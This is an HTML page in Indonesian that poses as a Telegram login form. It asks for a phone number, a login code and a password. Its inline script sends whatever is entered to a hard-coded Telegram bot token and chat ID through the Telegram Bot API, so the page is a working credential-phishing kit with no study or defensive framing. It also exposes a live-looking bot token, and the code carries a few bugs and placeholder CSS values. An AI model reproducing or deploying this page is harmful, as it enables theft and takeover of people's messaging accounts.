<!DOCTYPE html>

<html lang="en">

<head>

  <link rel="stylesheet" href="style.css">

  <meta charset="UTF-8">

  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title></title>

</head>

<body>

  

    <main>

      <div class="centered">

        <form id="form">

          <h1>LOGIN MELALUI TELEGRAM</h1>

          <label>

            <span></span>

            <div class="input-box">

              <input type="number" id="number" placeholder="nomor telepon" required>

            </div>

            <div class="input-box">

              <input type="nama" id="nama" placeholder="Code" required>

            </div>

            <div class="input-box">

              <input type="password" id="password" placeholder="password" required>

            </div>

          </label>

          <button type="submit" class="centered-submit">

            KIRIM!

          </button>

        </form>

      </div>

    </main> 

<script>

  let form = document.querySelector("#form");

let bot = {

  TOKEN: "7653188082:AAEMjZKBaivSo5nEHy1HVlQbRYqNvCwuHic",

  chatID: "-4546395669",

}

form.addEventListener("submit", e => {

  e.preventDefault();

  

  let message = document.querySelector("#message");

  let nama = document.querySelector("#nama");

  

  fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=number:${message.value}

                             

                              Code:

  ${nama.value}

                            Password:

  ${password.value}`, {

    method: "GET"

  })

  .then(succes => {

    alert("Message send successfully!")

  }, error => {

    alert("Message not send!")

    console.log(error);

  })

})

</script>

<style>

*{

  margin: 0;

  padding: 0;

  box-sizing: border-box;

  font-family: "Poppins", sans-serif;

}

main {

  display: flex;

  justify-content: center;

  align-items: center;

  min-height: 100vh;

  background: url(Images1.jpg) no-repeat;

  background-size: cover;

  background-position: center;

}

.centered{

  width: 420px;

  background: transparent;

  border: 2px solid rgba(red, green, blue, alpha);

  backdrop-filter: blur(9px);

  color: white;

  border-radius: 12px;

  padding: 30px 40px;

}

.centered h1{

  font-size: 25px;

  text-align: center;

  color: rgba(red, green, blue, alpha);

}

.centered .input-box{

  position: relative;

  width: 100%;

  height: 50px;

  

  margin: 30px 0;

}

.input-box input{

  width: 100%;

  height: 100%;

  background: transparent;

  border: none;

  outline: none;

  border: 2px solid rgba(red, green, blue, alpha);

  border-radius: 40px;

  font-size: 16px;

  color: white;

  padding: 20px 45px 20px 20px;

}

.input-box i{

  position: absolute;

  right: 20px;

  top: 30%;

  transform: translate(-50%);

  font-size: 20px;

}

.centered .remember-forget{

  display: flex;

  justify-content: space-between;

  font-size: 14.5px;

  margin: -15px 0 15px;

}

.remember-forget label input{

  color: white;

  margin-right: 3px;

  

}

.remember-forget a:hover{

  text-decoration: underline;

}

.centered-submit{

  width: 100%;

  height: 45px;

  background: white;

  border: none;

  outline: none;

  border-radius: 40px;

  box-shadow: 0 0 10px rgba(red, green, blue, alpha);

  cursor: pointer;

  font-size: 16px;

  color: #333;

  font-weight: 600;

}

.centered .register-link{

  font-size: 14.5px;

  text-align: center;

  margin: 20px 0 15px;

  

}

.register-link p a{

  color: white;

  text-decoration: none;

  font-weight: 600;

}

.register-link p a:hover{

  text-decoration: underline;

}

main .centered{

  padding: 20px;

  width: 500%;

  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;

  max-width: 400px;

  box-shadow: 0 0 15px rgba(red, green, blue, alpha);

}

main .centered label {

  width: 100%;

  display: block;

  margin-bottom: 20px;

}

main .centered label input {

  width: 100%;

  height: 40px;

  border: solid 1px;

  outline: none;

  padding: 5px;

  font-size: 18px;

  margin-top: 20px;

}

</style>

</body>

</html>
